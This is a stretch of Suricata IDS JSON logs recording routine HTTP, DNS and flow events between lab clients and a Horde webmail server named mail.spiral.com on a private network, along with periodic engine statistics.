{"timestamp":"2020-02-29T00:06:04.000168+0000","event_type":"stats","stats":{"uptime":14016,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":45255,"memcap":0}}} {"timestamp":"2020-02-29T00:06:10.000595+0000","flow_id":1750343770728430,"event_type":"flow","src_ip":"192.168.10.81","src_port":52686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":774,"bytes_toclient":1067,"start":"2020-02-29T00:05:04.223214+0000","end":"2020-02-29T00:05:09.228332+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:10.001033+0000","flow_id":1969571786109511,"event_type":"flow","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":24,"bytes_toserver":4346,"bytes_toclient":20355,"start":"2020-02-29T00:04:59.373319+0000","end":"2020-02-29T00:05:09.312383+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:11.000176+0000","event_type":"stats","stats":{"uptime":14023,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} {"timestamp":"2020-02-29T00:06:13.000304+0000","flow_id":579007405056244,"event_type":"flow","src_ip":"192.168.10.130","src_port":34738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":7102,"start":"2020-02-29T00:05:07.352500+0000","end":"2020-02-29T00:05:12.708945+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:14.005733+0000","flow_id":1227397127562127,"event_type":"flow","src_ip":"192.168.10.122","src_port":57294,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:13.484239+0000","end":"2020-02-29T00:01:13.598172+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:17.000973+0000","flow_id":413775703090290,"event_type":"flow","src_ip":"192.168.10.122","src_port":35934,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:16.894066+0000","end":"2020-02-29T00:01:16.999282+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:18.000275+0000","event_type":"stats","stats":{"uptime":14030,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2689,"new_pruned":15,"est_pruned":2278,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22157,"memcap_state":0,"memcap_global":0},"http":{"memuse":45015,"memcap":0}}} {"timestamp":"2020-02-29T00:06:18.002196+0000","flow_id":1558539106348560,"event_type":"flow","src_ip":"192.168.10.122","src_port":56244,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:17.421392+0000","end":"2020-02-29T00:01:17.526761+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:19.000515+0000","flow_id":342874398464368,"event_type":"flow","src_ip":"192.168.10.130","src_port":34740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4180,"start":"2020-02-29T00:05:13.268656+0000","end":"2020-02-29T00:05:18.458861+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:21.000394+0000","flow_id":752305025627883,"event_type":"flow","src_ip":"192.168.10.122","src_port":44785,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:20.243435+0000","end":"2020-02-29T00:01:20.354683+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:21.002044+0000","flow_id":1043121556102940,"event_type":"flow","src_ip":"192.168.10.122","src_port":37302,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:19.991004+0000","end":"2020-02-29T00:01:20.096028+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:24.000289+0000","flow_id":992711525217637,"event_type":"flow","src_ip":"192.168.10.122","src_port":57146,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:23.144741+0000","end":"2020-02-29T00:01:23.249667+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:24.001303+0000","flow_id":644114799654146,"event_type":"flow","src_ip":"192.168.10.122","src_port":41023,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:23.849154+0000","end":"2020-02-29T00:01:23.954296+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:24.001991+0000","flow_id":509385984074491,"event_type":"flow","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1495,"bytes_toclient":6239,"start":"2020-02-29T00:04:50.025339+0000","end":"2020-02-29T00:05:23.459884+0000","age":33,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:25.000302+0000","event_type":"stats","stats":{"uptime":14037,"capture":{"kernel_packets":133563,"kernel_drops":0},"decoder":{"pkts":133563,"bytes":92428978,"invalid":181,"ipv4":132114,"ipv6":8,"ethernet":133563,"raw":0,"null":0,"sll":0,"tcp":127013,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2690,"new_pruned":15,"est_pruned":2282,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20504,"memcap_state":0,"memcap_global":0},"http":{"memuse":44855,"memcap":0}}} {"timestamp":"2020-02-29T00:06:25.001840+0000","flow_id":1948590856745586,"event_type":"flow","src_ip":"192.168.10.122","src_port":59007,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:24.471666+0000","end":"2020-02-29T00:01:24.576661+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:30.002978+0000","flow_id":83501324109156,"event_type":"flow","src_ip":"192.168.10.130","src_port":34742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1167,"bytes_toclient":7936,"start":"2020-02-29T00:05:23.460132+0000","end":"2020-02-29T00:05:29.625666+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:30.700781+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7519,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:30.811812+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43136,"proto":"UDP","dns":{"type":"answer","id":7519,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:30.811812+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43136,"proto":"UDP","dns":{"type":"answer","id":7519,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:30.847321+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:06:30.847321+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:06:31.000843+0000","flow_id":943744603502432,"event_type":"flow","src_ip":"192.168.10.122","src_port":58746,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:29.964448+0000","end":"2020-02-29T00:01:30.077302+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:31.436369+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35205,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18967,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:32.000213+0000","event_type":"stats","stats":{"uptime":14044,"capture":{"kernel_packets":133571,"kernel_drops":0},"decoder":{"pkts":133580,"bytes":92431195,"invalid":181,"ipv4":132127,"ipv6":8,"ethernet":133580,"raw":0,"null":0,"sll":0,"tcp":127024,"udp":4908,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2706,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2722,"synack":2713,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1749,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2238,"failed_udp":110},"tx":{"http":4535,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2315}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2285,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20431,"memcap_state":0,"memcap_global":0},"http":{"memuse":40143,"memcap":0}}} {"timestamp":"2020-02-29T00:06:35.851694+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34748,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:06:36.553564+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35205,"proto":"UDP","dns":{"type":"answer","id":18967,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:36.553564+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35205,"proto":"UDP","dns":{"type":"answer","id":18967,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:36.623375+0000","flow_id":926165322136906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7770}} {"timestamp":"2020-02-29T00:06:39.000306+0000","event_type":"stats","stats":{"uptime":14051,"capture":{"kernel_packets":133592,"kernel_drops":0},"decoder":{"pkts":133605,"bytes":92441637,"invalid":181,"ipv4":132150,"ipv6":8,"ethernet":133605,"raw":0,"null":0,"sll":0,"tcp":127044,"udp":4910,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2707,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2723,"synack":2714,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1750,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2239,"failed_udp":110},"tx":{"http":4536,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2316}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2286,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":108161,"memcap":0}}} {"timestamp":"2020-02-29T00:06:41.624581+0000","flow_id":926165322136906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7770},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":42655,"tx_id":0}} {"timestamp":"2020-02-29T00:06:41.867378+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46214,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62371,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:41.975863+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46214,"proto":"UDP","dns":{"type":"answer","id":62371,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:41.975863+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46214,"proto":"UDP","dns":{"type":"answer","id":62371,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:42.066598+0000","flow_id":1874300828193260,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5273}} {"timestamp":"2020-02-29T00:06:42.582426+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43798,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48233,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:42.690395+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43798,"proto":"UDP","dns":{"type":"answer","id":48233,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:42.690395+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43798,"proto":"UDP","dns":{"type":"answer","id":48233,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:42.845851+0000","flow_id":2186244303009272,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6892}} 